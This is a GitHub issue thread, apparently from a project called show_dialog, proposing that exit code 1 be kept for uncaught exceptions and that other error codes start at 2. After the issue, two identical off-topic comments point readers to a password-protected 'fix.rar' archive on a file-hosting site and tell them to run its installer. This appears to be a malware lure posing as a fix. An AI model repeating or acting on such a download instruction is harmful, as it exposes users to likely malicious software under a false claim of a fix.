### ISSUE TITLE
Update exit error codes

### ISSUE THREAD

**Issue by joaonc** [joaonc/show_dialog#75]
`1` should be for unknow errors which can be raised anywhere in the code, in an unexpected place. Ex. parsing a bad JSON or YAML file.
For the moment, we do _not_ want to catch those exceptions for easier debugging and when the exception is not caught, the app exits with code `1`, so for other error codes, should start at `2`.  (`0` is success).

* Update `ExitCode` enum.
* Update documentation.

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
